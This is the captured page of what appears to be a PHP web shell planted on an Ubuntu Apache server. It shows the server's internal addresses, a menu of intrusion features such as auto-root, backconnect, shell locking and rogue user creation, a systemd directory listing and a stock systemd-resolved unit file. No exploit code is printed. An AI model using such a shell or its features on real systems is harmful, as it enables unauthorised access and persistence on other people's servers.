Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
systemd /
system /
multi-user.target.wants /
[ HOME SHELL ]
Name
Size
Permission
Action
ModemManager.service
515
B
-rw-r--r--
apache2.service
419
B
-rw-r--r--
console-setup.service
312
B
-rw-r--r--
cron.service
319
B
-rw-r--r--
dmesg.service
409
B
-rw-r--r--
e2scrub_reap.service
553
B
-rw-r--r--
grub-common.service
583
B
-rw-r--r--
grub-initrd-fallback.service
408
B
-rw-r--r--
irqbalance.service
505
B
-rw-r--r--
krb5-admin-server.service
501
B
-rw-r--r--
krb5-kdc.service
583
B
-rw-r--r--
lxd-agent.service
476
B
-rw-r--r--
mariadb.service
5.76
KB
-rw-r--r--
networkd-dispatcher.service
258
B
-rw-r--r--
nginx.service
1.01
KB
-rw-r--r--
nmbd.service
412
B
-rw-r--r--
ntp.service
354
B
-rw-r--r--
oddjobd.service
263
B
-rw-r--r--
open-vm-tools.service
489
B
-rw-r--r--
pollinate.service
404
B
-rw-r--r--
postgresql.service
337
B
-rw-r--r--
remote-fs.target
530
B
-rw-r--r--
rsyslog.service
469
B
-rw-r--r--
secureboot-db.service
735
B
-rw-r--r--
smbd.service
519
B
-rw-r--r--
snap-core20-2682.mount
326
B
-rw-r--r--
snap-core20-2686.mount
326
B
-rw-r--r--
snap-lxd-36558.mount
320
B
-rw-r--r--
snap-lxd-36918.mount
320
B
-rw-r--r--
snap-snapd-25577.mount
326
B
-rw-r--r--
snap-snapd-25935.mount
326
B
-rw-r--r--
snap.lxd.activate.service
467
B
-rw-r--r--
snapd.apparmor.service
1.21
KB
-rw-r--r--
snapd.autoimport.service
432
B
-rw-r--r--
snapd.core-fixup.service
369
B
-rw-r--r--
snapd.recovery-chooser-trigger...
550
B
-rw-r--r--
snapd.seeded.service
308
B
-rw-r--r--
snapd.service
607
B
-rw-r--r--
ssh.service
538
B
-rw-r--r--
sssd.service
705
B
-rw-r--r--
systemd-networkd.service
2.27
KB
-rw-r--r--
systemd-resolved.service
1.74
KB
-rw-r--r--
thermald.service
309
B
-rw-r--r--
ua-reboot-cmds.service
323
B
-rw-r--r--
ubuntu-advantage.service
1.31
KB
-rw-r--r--
ufw.service
333
B
-rw-r--r--
unattended-upgrades.service
377
B
-rw-r--r--
vsftpd.service
248
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : systemd-resolved.service
# SPDX-License-Identifier: LGPL-2.1-or-later # # This file is part of systemd. # # systemd is free software; you can redistribute it and/or modify it # under the terms of the GNU Lesser General Public License as published by # the Free Software Foundation; either version 2.1 of the License, or # (at your option) any later version. [Unit] Description=Network Name Resolution Documentation=man:systemd-resolved.service(8) Documentation=man:org.freedesktop.resolve1(5) Documentation=https://www.freedesktop.org/wiki/Software/systemd/writing-network-configuration-managers Documentation=https://www.freedesktop.org/wiki/Software/systemd/writing-resolver-clients DefaultDependencies=no After=systemd-sysusers.service systemd-networkd.service Before=network.target nss-lookup.target shutdown.target Conflicts=shutdown.target Wants=nss-lookup.target [Service] AmbientCapabilities=CAP_SETPCAP CAP_NET_RAW CAP_NET_BIND_SERVICE BusName=org.freedesktop.resolve1 CapabilityBoundingSet=CAP_SETPCAP CAP_NET_RAW CAP_NET_BIND_SERVICE ExecStart=!!/lib/systemd/systemd-resolved LockPersonality=yes MemoryDenyWriteExecute=yes NoNewPrivileges=yes PrivateDevices=yes PrivateTmp=yes ProtectProc=invisible ProtectClock=yes ProtectControlGroups=yes ProtectHome=yes ProtectKernelLogs=yes ProtectKernelModules=yes ProtectKernelTunables=yes ProtectSystem=strict Restart=always RestartSec=0 RestrictAddressFamilies=AF_UNIX AF_NETLINK AF_INET AF_INET6 RestrictNamespaces=yes RestrictRealtime=yes RestrictSUIDSGID=yes RuntimeDirectory=systemd/resolve RuntimeDirectoryPreserve=yes SystemCallArchitectures=native SystemCallErrorNumber=EPERM SystemCallFilter=@system-service Type=notify User=systemd-resolve WatchdogSec=3min [Install] WantedBy=multi-user.target Alias=dbus-org.freedesktop.resolve1.service
Close